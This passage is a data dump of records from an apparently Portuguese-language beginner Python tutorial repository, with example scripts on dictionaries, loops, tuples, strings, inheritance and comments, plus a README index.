y)\n\n'''\nVerifica se a chave existe (Check if Key Exists)\n\nPara sabermos se uma chave específica se encontra no dicionário, usamos a keyword in.\n'''\n# Exemplo:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nif 'ano' in dicio_carros:\n print(\"Sim, 'ano' e uma chave do dicionario dicio_carros.\")\n\n\n'''\nComprimento do dicionário (Dictinary Length)\n\nPara sabermos quantos itens (pares de chaves-valores) um dicionario possui, usamos a funcao len().\n'''\n\n# Exemplo:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nprint(len(dicio_carros))\n\n'''\nAdicionando itens (Adding Items)\n\nA adição de um item ao dicionário é feita usando uma nova chave de índice e atribuindo um valor e ela.\n'''\n\n# Exemplo:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\ndicio_carros['cor'] = 'grafiti'\nprint(dicio_carros)\n\n# O método pop() remove o item de um valor de chave específica\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\ndicio_carros.pop('marca')\nprint(dicio_carros)\n\n# O método popitem() remove o último item inserido.\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\ndicio_carros.popitem()\nprint(dicio_carros)\n\n# A palavra-chave del remove o item com o nome da chave especificado.\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\ndel 
dicio_carros['marca']\nprint(dicio_carros)\n\n# O método clear() esvazia o dicionário\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\ndicio_carros.clear()\nprint(dicio_carros)\n\n'''\nCopiar um dicionário (Copy a Dictionary)\n\nNão podemos copiar um dicionário simplesmente digitando dicio_carros_1 = dicio_carros_2, porque dicio_carros_2 será apenas uma referência\nao dicio_carros_1, e as alterações feitas no dicio_carros_1 também serão feitas do dicio_carros_2.\n\nExistem maneiras de se fazer uma cópia, uma maneira é usar o bult-in copy() do dicionário.\n'''\n# Exemplo:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nmeu_dicionario = dicio_carros.copy()\nprint(meu_dicionario)\n\n# Outra maneira de se fazer cópia, é com uso da função bult-in dict():\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2021'\n}\n\nmeu_dicionario = dict(dicio_carros)\nprint(meu_dicionario)\n\n'''\nDicionários aninhados (Nested Dictionaries)\n\nUm dicionário também pode conter muitos dicionários.\n'''\n# Exemplo:\n\nmeus_cursos_programacao = {\n 'beginner': {\n 'HTML': '5',\n 'horas': 100\n\n },\n 'intermediate': {\n 'JavaScript': 'ES6',\n 'horas': 200\n },\n 'advanced': {\n 'Python': '3',\n 'horas': 300\n }\n}\n\nprint(meus_cursos_programacao)\n\n# Podemos ainda, aninhar três dicionários que já existem como dicionários:\n\nbeginner = {\n 'HTML': '5',\n 'horas': 100\n\n}\n\nintermediate = {\n 'JavaScript': 'ES6',\n 'horas': 200\n}\n\nadvanced = {\n 'Python': '3',\n 'horas': 300\n}\n\nmeus_cursos_programacao_2 = {\n 'beginner': beginner,\n 'intermediate': intermediate,\n 'advanced': advanced\n}\n\nprint(meus_cursos_programacao_2)\n\n'''\nO construtor dict() (The dict() Constructor)\n\nTambém é possível usar o construtor dict() para criar um novo dicionário.\n'''\n# Exemplo:\n\ndicio_carros = dict(marca='Ford', modelo='Fusion', year=2020)\n\nprint(dicio_carros)\n"
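\n# Exemplo adicional (esboço ilustrativo, não consta do tutorial original):\n# para acessar um valor dentro de um dicionário aninhado, encadeamos as chaves de cada nível:\n\nprint(meus_cursos_programacao['beginner']['horas'])  # imprime 100\n"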
},
{
"alpha_fraction": 0.6587791442871094,
"alphanum_fraction": 0.6714677810668945,
"avg_line_length": 23.711864471435547,
"blob_id": "92cf14e7def51f0f986fb99e31c276f69fa23aae",
"content_id": "d501e87835190b5790de790ac9835b8dd07cdc67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2972,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 118,
"path": "/semana-3/for_loops.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nFor Loops\n\nUm loop for é usado para iterar sobre uma sequência (percorre uma lista, tupla, dicionário, conjunto de string).\n'''\n# Exemplo:\n\nfrutas = ['amora', 'banana', 'cereja', 'goiaba', 'morango', 'uva']\nfor f in frutas:\n print(f)\n\n'''\nLoop atrevés de uma String\n\nMesmo as Strings são objetos iteráveis, elas contém uma sequência de caracteres.\n'''\n# Exemplo:\n\nfor f in 'banana':\n print(f)\n\n'''\nA declaração Break\n\nCom o Break, podemos parar o loop antes que ele percorra todos os itens.\n'''\n# Exemplo 1 - saia do loop quando f for 'cereja':\n\nfrutas = ['amora', 'banana', 'cereja', 'goiaba', 'morango', 'uva']\nfor f in frutas:\n print(f)\n if f == 'cereja':\n break\n\n# Exemplo 2 - saia do loop quando f for 'cereja', mas desta vez a quebra ocorre antes do print:\n\nfrutas = ['amora', 'banana', 'cereja', 'goiaba', 'morango', 'uva']\nfor f in frutas:\n if f == 'cereja':\n break\n print(f)\n\n'''\nA declaração Continue\n\nCom a declaração continue, podemos parar a iteração atual do loop a continuar com a próxima\n'''\n# Exemplo - não imprima 'cereja':\n\nfrutas = ['amora', 'banana', 'cereja', 'goiaba', 'morango', 'uva']\nfor f in frutas:\n if f == 'cereja':\n continue\n print(f)\nfrutas = ['amora', 'banana', 'cereja', 'goiaba', 'morango', 'uva']\nfor f in frutas:\n if f == 'cereja':\n break\n print(f)\n\n'''\nA função range()\n\nPara percorrer um conjunto de itens um número específico de vezes, podemos usar a função range().\n\nA função range() retorna uma sequência de números, iniciando em 0 por padrão e incrementando em 1 (por padrão), e termina em um número especificado.\n'''\n# Exemplo:\n\nfor numeros in range(7):\n print(numeros)\n\n# É possível especificar o valor inicial adicionando uma parâmetro: range(2,7), que significa de 2 a 7 (mas não inclui o 7):\n\nfor numeros in range(2, 7):\n print(numeros)\n\n# A função range() por padrão incrementa de 1 em 1, no entanto, é possível especificar o valor do incremento adicionando um terceiro parâmetro: range(2,20,2):\n\nfor numeros in range(2, 20, 2):\n print(numeros)\n\n'''\nElse no loop For\n\nO else especifica um bloco de código a ser executado quando o loop for concluído.\n'''\n# Exemplo - imprima todos os números de 0 a 20 e imprima uma mensagem quando o loop terminar:\n\nfor x in range(20):\n print(x)\nelse:\n print('Fim!')\n\n'''\nLoops Aninhados\n\nUm loop aninhado é um loop dentro de outro loop.\nO 'loop interno' será executado uma vez para cada iteração do 'loop externo'.\n'''\n# Exemplo - imprima um adjetivo para cada fruta:\n\nadjetivo = ['vermelho(a)', 'grande', 'saboroso(a)']\nfrutas = ['maçã', 'banana', 'cereja']\n\nfor x in adjetivo:\n for y in frutas:\n print(x, y)\n\n'''\nA Declaração pass\n\nOs loops for não podem estar vazios, mas se, por algum motivo, tivermos um loop sem conteúdo, inserimos a instrução PASS para evitar erros.\n'''\n# Exemplo:\n\nfor numeros in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]:\n pass\n"
},
{
"alpha_fraction": 0.6969696879386902,
"alphanum_fraction": 0.7060117125511169,
"avg_line_length": 25.406452178955078,
"blob_id": "4a30168eb6391b52d90a84914db68fdc3cd58833",
"content_id": "dd425fef2a830e769c58dda93d6845d03ff32337",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4157,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 155,
"path": "/semana-2/tuples.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nTUPLAS\n\nTupla é uma coleção de dados ordenados e imutável. Em Python Tuplas são declaradas entre parênteses.\n'''\ntuplaFrutas = ('abacate', 'banana', 'caju')\nprint(tuplaFrutas)\n\n# Acessando itens de uma Tupla\n\ntuplaFrutas = ('abacate', 'banana', 'caju')\nprint(tuplaFrutas[1])\n\n# Indices negativos (significa começar do fim, -1 refere-se ao último item, -2 ao segundo último item e etc.)\n\ntuplaFrutas = ('abacate', 'banana', 'caju')\nprint(tuplaFrutas[-1])\n\n# Ordenar Indices (Range of Indexes) - Podemos definir uma ordem de índices, definindo onde iniciar e onde terminar.\n# Quando definimos uma ordem, o valor de retorno sempre será uma nova Tupla com os itens especificados.\n# Exemplo - (Retorna o terceiro, quarto e quinto item):\n\ntuplaFrutas = ('abacate', 'banana', 'caju', 'melancia',\n 'goiaba', 'manga', 'morango')\nprint(tuplaFrutas[2:5])\n\n# Ordem negativa de índices (Range of Negative Indexes)\n# Exemplo - (Retorna o item do índice -4 (incluído) até o índice -1 (excluído)):\n\ntuplaFrutas = ('abacate', 'banana', 'caju', 'melancia',\n 'goiaba', 'manga', 'morango')\nprint(tuplaFrutas[-4:-1])\n\n'''\nAlterar valores de uma tupla (Change Tuple Values)\n\nDepois que uma tupla é criada, não podemos alterar seus valores. Tuplas são imutáveis imutáveis, como tmabém é chamando.\n\nMas há uma solução alternativa. Podemos converter uma tupla em lista, alterar a lista e converter a lista novamnete em uma tupla.\n'''\n# Exemplo:\nx = ('abacate', 'pera', 'morango')\ny = list(x)\ny[1] = 'kiwi'\nx = tuple(y)\n\nprint(x)\n\n# LOOP ATRAVÉS DE UMA TUPLA (Loop Through a Tuple)\n# Podemos percorrer os itens de uma tupla usando o for loop.\n# Exemplo:\n\ntuplaFrutas = ('ameixa', 'banana', 'caqui')\nfor x in tuplaFrutas:\n print(x)\n\n# VERIFICAR SE O ITEM EXISTE\n# Para vereficarmos se um item específico está presente em uma tupla, usamos a palavra chave IN.\n# Exemplo:\n\ntuplaFrutas = ('ameixa', 'banana', 'caqui')\nif 'banana' in tuplaFrutas:\n print('Success! Banana esta presente em tupla frutas.')\n\n# COMPRIMENTO DE UMA TUPLA (Tuple Length)\n# Para verificarmos quantos itens possui uma tupla, usamos o método LEN().\n# Exemplo:\n\ntuplaFrutas = ('ameixa', 'banana', 'caqui')\nprint(len(tuplaFrutas))\n\n'''\nADIÇÃO DE ITENS (Add Items)\nUma vez que a tupla é criada, não podemos adicionar itens a ela. 
Tuplas são IMUTÁVEIS.\n'''\n# Exemplo:\n\ntuplaFrutas = ('ameixa', 'banana', 'caqui')\ntuplaFrutas[3] = 'morango' # Isso vai retornar um TypeError.\nprint(tuplaFrutas)\n\n'''\nCRIAÇÃO DE UMA TUPLA COM UM ITEM (Create Tuple With One Item)\nPara criar uma tupla com apenas um item, podemos adicionar uma vírgula depois do item, caso contrário, o Python não reconhecerá como uma tupla.\n'''\n# Exemplo:\n\ntuplaFrutas = ('ameixa',)\nprint(type(tuplaFrutas))\n\n# Não é uma tupla\n\ntuplaFrutas = ('ameixa')\nprint(type(tuplaFrutas))\n\n'''\nREMOVER ITENS (Remove Itens)\n\nTuplas são IMUTÁVEIS, sendo assim, não podemos remover seus itens, mas podemos deletar a tupla completa.\n'''\n# A palavra chave DEL pode deletar a tupla completa.\n# Exemplo:\n\ntuplaFrutas = ('ameixa', 'banana', 'caqui')\ndel tuplaFrutas\n# será mostrado um 'NameError' porque a tupla não existe mais.\nprint(tuplaFrutas)\n\n'''\nUNIÃO DE DUAS TUPLAS (Join Two Tuples)\n\nPara unir duas ou mais tuplas usamos o operador +.\n'''\n# Exemplo:\n\ntuplaLetras = ('a', 'b', 'c', 'd', 'e')\ntuplaNumeros = (1, 2, 3)\n\ntuplaUniao = tuplaLetras + tuplaNumeros\nprint(tuplaUniao)\n\n'''\nCONSTRUTOR tuple() \n\nÉ possível usar o cosntrutor tuple() para criar uma tupla.\n'''\n# Exemplo:\n\n# atenção para os duplos parênteses\nestaTupla = tuple(('abacate', 'banana', 'caju'))\nprint(estaTupla)\n\n'''\nMÉTODOS TUPLA (Tuple Methods)\n\nPython possui dois métodos que podemos usar em tuplas.\n\nMétodo count() - Retorna o número de vezez que um específico valor aparece na tupla.\nMétodo index() - Procura na tupla por um específico valor e retorna a posição de onde ele se encontra.\n'''\n# Exemplo (count()):\n\nestaTupla = (5, 8, 6, 4, 5, 7, 8, 7, 3, 1)\n\nx = estaTupla.count(5) \n\nprint(x)\n\n# Exemplo (index()):\n\nestaTupla = (5, 8, 6, 4, 5, 7, 8, 7, 3, 1)\n\nx = estaTupla.index(3) \n\nprint(x)"
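\n# Exemplo adicional (esboço ilustrativo, não consta do tutorial original):\n# 'desempacotamento' (unpacking) atribui cada item da tupla a uma variável:\n\n(fruta1, fruta2, fruta3) = ('abacate', 'banana', 'caju')\nprint(fruta1)\nprint(fruta2)\nprint(fruta3)\n"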
},
{
"alpha_fraction": 0.70987868309021,
"alphanum_fraction": 0.7190641164779663,
"avg_line_length": 22.744855880737305,
"blob_id": "fb3e63cdbcffa2f61571c974bb5c0de5de0a6674",
"content_id": "d204c29ac65c3ff3103510695f90cad765030b36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5865,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 243,
"path": "/semana-1/strings.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Strings\n\nStrings literais\n\nStrtings literais em Python são declaradas entre aspas simples ou duplas.\n\nVocê pode exibir uma String literal com a função print().\n'''\n\n# Exemplo:\n\nprint('Hello')\nprint(\"Hello\")\n\n''' \nAtribuição de String a uma Variável\n\nAtribuir uma String a uma Variável é feita com o nome da Variável seguida por um sinal de igual e a String:\n'''\n\na = \"Hello\"\nprint(a)\n\n'''\nStrings de Multilinhas\n\nVocê pode atribuir uma String de multilinhas para uma variável, usando três aspas simples/duplas:\n'''\n# Exemplo:\n\na = \"\"\"Lorem ipsum dolor sit amet,\nconsectetur adipiscing elit,\nsed do eiusmod tempor incididunt\nut labore et dolore magna aliqua.\"\"\"\n\nprint(a)\n\n'''\nStrings são Arrays\n\nComo muitas outras linguagens de programação populares, as Strings no Python são matrizes de bytes que representam caracteres unicode.\n\nNo entanto, o Python não possui um tipo de dados de caractere; um único caractere é simplesmente uma String com comprimento 1.\n\nParênteses retos podem ser usados para acessar elementos da sequência.\n'''\n\n# Exemplo\n# Coloque o caracter na posição 1 (lembre-se de que o primeiro caracter tem a posição 0):\n\na = 'Hello, World!'\nprint(a[1])\n\n'''\nSlicing (Fatiamento)\n\nVocê pode retornar um intervalo de caracteres usando a sintaxe Slice.\n\nEspecifique o índice inicial e o final, separados por dois pontos, para retornar uma parte da sequência.\n'''\n\n# Exemplo:\n# Coloque os caracteres da posição 2 para a posição 5 (não incluídos):\n\nb = \"Hello, World!\"\nprint(b[2:5])\n\n'''\nNegative Indexing (Indexação Negativa)\n\nPodemos usar índices negativos para iniciar o slice do final de uma String.\n'''\n# Exemplo:\n\nb = 'Hello, Wolrd!'\nprint(b[-5:-2])\n\n'''\nString Length (Comprimento da String)\n\nPara obter o comprimento de uma string, usamos a função len().\n'''\n# A função len() retorna o comprimento de uma String ():\n\na = 'Hello, World!'\nprint(len(a))\n\n'''\nMétodos de String\n\nO Python possui um conjunto de métodos internos que você pode usar em Strings.\n'''\n\n# O método strip() remove qualquer espaço do início ou do final da string:\n\na = ' Hello, Wolrd! 
'\nprint(a.strip()) # retorna 'Hello, World!'\n\n# O método lower() retorna a string em letras minúsculas:\n\na = 'Hello, World!'\nprint(a.lower())\n\n# O método upper() retorna a string em letras maiúsculas:\n\na = 'Hello, World!'\nprint(a.upper())\n\n# O método replace() substitui uma string por outra string:\n\na = 'Hello, World!'\nprint(a.replace('H', 'J'))\n\n# O método split() divide a sequência em substrings se encontrar instâncias do separador:\n\na = 'Hello, World!'\nprint(a.split(',')) # retorna ['Hello', 'World!']\n\n'''\nCheck String (Verificar String)\n\nPara verificar se uma determinada frase ou caracter está presente em uma string, podemos usar\nas palavras-chvave in ou not in.\n'''\n\n# Exemplo - Check se a frase 'ain' está presente no seguinte texto:\n\ntxt = 'The rain in Spain stays mainly in the plain.'\nx = 'ain' in txt\nprint(x)\n\n# Exemplo - Check se na frase 'ain' NÃO está presente no seguinte texto:\n\ntxt = 'The rain in Spain stays mainly in the plain.'\nx = 'ain' not in txt\nprint(x)\n\n'''\nString Concatenation (Concatenação de strings)\n\nPara concatenar ou combinar duas sequências, podemos usar o operador +.\n'''\n# Exemplo:\n# Mesclar a variável A com a variável B dentro da variável C:\n\na = 'Hello '\nb = 'World'\nc = a + b\nprint(c)\n\n'''\nString Format (Formato de cadeia)\n\nNão podemos combinar (concatenar) uma sequência do tipo String com um Integer, isso resultará em TypeError.\n'''\n\n# Exemplo:\n\nage = 36\ntxt = 'My name is John, I am ' + age\nprint(txt)\n\n'''\nMas podemos combinar Strings com Números usando o método format().\n\nO método format() pega os argumentos passados, formata-os e coloca-os na String \nem que os espaços reservados {} estão.\n'''\n# Exemplo:\n# Use o método format() para inserir Números dentro de Strings:\n\nage = 36\ntxt = 'My name is John, and I am {}'\nprint(txt.format(age))\n\n# O método format() recebe um número ilimitado de argumentos que são colocados nos respectivos espaços reservados:\n\nquantity = 3\nitemno = 567\nprice = 49.95\nmyorder = 'I want {} pieces of item {} for {} dollars.'\nprint(myorder.format(quantity, itemno, price))\n\n# Podemos usar números de índice {0} para garantir que os argumentos sejam colocados nos espaços reservados corretamente:\n\nquantity = 3\nitemno = 567\nprice = 49.95\nmyorder = 'I want to pay {2} dollars for {0} pieces of item {1}.'\nprint(myorder.format(quantity, itemno, price))\n\n'''\nEscape Character (Caracteres de Escape)\n\nPara inserir caracteres que são ilegais em uma string, usamos Caracteres de Escape.\nUm Caractere de Escape é uma barra invertida '\\' seguida pelo caractere que você deseja inserir.\nUm exemplo de Caractere ilegal é uma aspas duplas dentro de uma string que é cercada por aspas duplas.\n'''\n# Você receberá um erro se usar aspas duplas dentro de uma string cercada por aspas duplas:\n\n# txt = \"We are the so-called \"Vikings\" from the north.\"\nprint(txt)\n\n# Para corrigir esse problema, usamos o caractere de escape \\\".\n# O caracter de escape permite que você use aspas duplas quando normalmente não seria permitido:\n\ntxt = \"We are the so-called \\\"Vikings\\\" from the north.\"\nprint(txt)\n\n# Outros caracteres de escape usados em Python:\n\n# \\' -> Single Quote (Aspas simples)\ntxt = 'It\\'s alright.'\nprint(txt)\n\n# \\\\ -> Backslash (Barra invertida)\ntxt = 'This will insert one \\\\ (backslash).'\nprint(txt)\n\n# \\n -> New Line (Nova linha)\ntxt = 'Hello\\nWorld!'\nprint(txt)\n\n# \\r -> Carriage Return\ntxt = 'Hello\\rWorld!'\nprint(txt)\n\n# 
\\t -> Tab (Tabulação/Espaço)\ntxt = 'Hello\\tWorld!'\nprint(txt)\n\n# \\b -> Backspace (Retrocesso)\ntxt = 'Hello \\bWorld!'\nprint(txt)\n\n# \\ooo -> Octal value (Valor octal)\ntxt = '\\110\\145\\154\\157'\nprint(txt)\n\n# \\xhh -> Hex value (Valor hexadecimal)\ntxt = '\\x48\\x65\\x6c\\x6c\\x6f'\nprint(txt)\n"
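\n# Exemplo adicional (esboço ilustrativo, não consta do tutorial original):\n# a partir do Python 3.6, f-strings são uma alternativa ao método format():\n\nage = 36\ntxt = f'My name is John, and I am {age}'\nprint(txt)\n"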
},
{
"alpha_fraction": 0.6613665819168091,
"alphanum_fraction": 0.673184335231781,
"avg_line_length": 23.624338150024414,
"blob_id": "da5d7bcdbedd4b96127f9d48fa522fb2405935b6",
"content_id": "fef8bc7c029e31be7b41e977de5371e3d8e6f48b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4697,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 189,
"path": "/semana-3/inheritance.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPyhon Inheritance (Herança em Python)\n\nA herança nos permite definir uma classe que herda todos os métodos e propriedades de outra classe.\n\nClasse Pai é a classe que está sendo herdada, também chamada de classe Base.\n\nClasse Filha é a classe que herda de outra classe, também chamada de classe Derivada.\n'''\n# Criando uma classe Pai\n\n\nclass Pessoa:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n# Usamos a classe Pessoa para criar um objeto e em seguida executamos o método imprimeNome:\n\n\np1 = Pessoa('Robert', 'Souza')\np1.imprimeNome()\n\n'''\nChild Clas (Classe Filha)\n\nPara criarmos uma classe que herda a funcionalidade de outra classe, enviamos a classe Pai como parâmetro ao criar a classe Filha.\n'''\n# Exemlplo - Criação da classe Estudante que herdará as propriedades e os métodos da classe Pessoa:\n\n\nclass Pessoa2:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNomeCompleto(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante(Pessoa2):\n pass\n\n\ne1 = Estudante('Eric', 'Matthes')\ne1.imprimeNomeCompleto()\n\n'''\nAdd the __init__() Function\n\nAté o momento, criamos uma classe Filha que herda as propriedades e os métodos de sua classe Pai.\n\nVamos adicionar a função __init__() à classe Filha(em vez da palavra-chave pass).\n'''\n# OBS: A função __init__() é chamada automaticamente toda vez que a classe está sendo usada para criar um novo Objeto:\n\n\nclass Estudante2(Pessoa2):\n def __init__(self, nome, sobrenome):\n # add propriedades...\n\n # Quando Add a função __init__(), a classe Filha não herda mais a função __init__() da classe Pai:\n\n\nclass Pessoa3:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante3(Pessoa3):\n def __init__(self, nome, sobrenome):\n Pessoa3.__init__(self, nome, sobrenome)\n\n\np3 = Estudante3('Marijn', 'Haverbeke')\np3.imprimeNome()\n\n'''\nUso da super() Function\n\nPython também possui uma super() function que faz a classe Filha herdar todos os métodos e propriedades da classe Pai:\n'''\n# Exemplo:\n\n\nclass Pessoa4:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante4(Pessoa4):\n def __init__(self, nome, sobrenome):\n super().__init__(nome, sobrenome)\n\n\np4 = Estudante4('Robert', 'C. Martin')\np4.imprimeNome()\n\n# Obs: Ao usarmos a super() function, não precisamos usar o nome do elemento Pai, ele herdará automaticamente os métodos e propriedades da classe Pai.\n\n'''\nAdd Properties\n'''\n# Add uma propriedade 'anoGraduacao' à classe Estudante5:\n\n\nclass Pessoa5:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante5(Pessoa5):\n def __init__(self, nome, sobrenome):\n super().__init__(nome, sobrenome)\n self.anoGraduacao = 2020\n\n\np5 = Estudante5('Kent', 'Beck')\nprint(p5.anoGraduacao)\n\n'''\nNo exemplo abaixo o valor da propriedade'anoGraduacao' deve ser uma variável, passada para a classe 'Estudande6' ao criar objetos do 'Estudante6'.\nPara fazer isso, adicionamos o parâmetro na função __init__(). 
\n'''\n# Exemplo:\n\n\nclass Pessoa6:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante6(Pessoa6):\n def __init__(self, nome, sobrenome, ano):\n super().__init__(nome, sobrenome)\n self.anoGraduacao = ano\n\n\np6 = Estudante6('Guido', 'Van Rossum', 2021)\nprint(p6.anoGraduacao)\n\n'''\nAdd Methods\n'''\n# Add um método 'Bem vindo' a classe 'Estudante7':\n\n\nclass Pessoa7:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante7(Pessoa7):\n def __init__(self, nome, sobrenome, ano):\n super().__init__(nome, sobrenome)\n self.anoGraduacao = ano\n\n def BemVindo(self):\n print('Bem vindo', self.nome, self.sobrenome,\n 'ao ano de', self.anoGraduacao)\n\n\np7 = Estudante7('Guido', 'Van', 2021)\np7.BemVindo()\n\n# Obs: Se adicionarmos um método na classe Filha com o mesmo nome de um método da classe Pai, o método da classe Filha sobrescrevera o método da classe Pai.\n"
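\n# Exemplo adicional (esboço ilustrativo, não consta do tutorial original):\n# sobrescrevendo o método imprimeNome da classe Pai na classe Filha:\n\n\nclass Estudante8(Pessoa7):\n    def imprimeNome(self):\n        print('Estudante:', self.nome, self.sobrenome)\n\n\np8 = Estudante8('Ada', 'Lovelace')\np8.imprimeNome()  # executa a versão sobrescrita da classe Filha\n"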
},
{
"alpha_fraction": 0.7535328269004822,
"alphanum_fraction": 0.7763923406600952,
"avg_line_length": 67.74285888671875,
"blob_id": "60bc0505abc2dc5fa472339813e35627da281606",
"content_id": "5c39c38539b486ac036a7cfb95ff71300d2ee75d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2408,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 35,
"path": "/README.md",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "# Python Beginner\n\n\n\n## Indice\n\n* [Sintax](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Comments](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Variables](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Data Types](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Numbers](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Casting](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Strings](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Booleans](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [Operators](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [Lists](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [Tuples](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [Sets](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [Dictionaries](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [If...Else](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [While Loops](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [For Loops](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Functions](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Lambda](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Arrays](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Classes/Objects](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Inheritance](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Iterators](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n* [Scope](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n* [Modules](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n* [Dates](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n* [Math](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n* [JSON](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n\n_Fontes:_ python.org e w3schools.com (com adaptações).\n"
},
{
"alpha_fraction": 0.7316486239433289,
"alphanum_fraction": 0.7316486239433289,
"avg_line_length": 20.86842155456543,
"blob_id": "1eca8494f452f4b6888afe0e1847030014c843ff",
"content_id": "644ac5c7fb2b13be78ccb49cf321238e22325abc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 858,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 38,
"path": "/semana-1/comments.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nComentários em Python\n\nComentários podem ser usados para explicar o código Python.\nOs comentários podem ser usados para tornar o código mais legível.\nOs comentários podem ser usados para impedir a execução ao testar o código.\nOs comentários começam com um # e o Python os ignorará:\n'''\n# Exemplo:\n\n# Isso é um comentário de uma linha\nprint('Hello, World!')\n\n'''\nOs comentários podem ser colocados no final de uma linha, e o Python ignorará o restante da linha:\n'''\nprint('Hello, World!') # Isso é um comentário\n\n'''\nOs comentários não precisam ser texto para explicar o código, também podem ser usados para impedir \nque o Python execute o código:\n'''\n\n# print('Hello, World!')\nprint('Olá, amigo!')\n\n'''\nComentários de múltiplas linhas:\n'''\n\n\"\"\"\n\nThis is a comment\nwritten is\nmore than just one line\n\"\"\"\n\nprint('Hello, World!')\n"
},
{
"alpha_fraction": 0.7042186260223389,
"alphanum_fraction": 0.7205177545547485,
"avg_line_length": 18.14678955078125,
"blob_id": "133053645c39f4069078c53f42074aa23eaf9d23",
"content_id": "51ba67b7b240636aa6fdc0e528b984f01d71c26d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2166,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 109,
"path": "/semana-4/scope.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
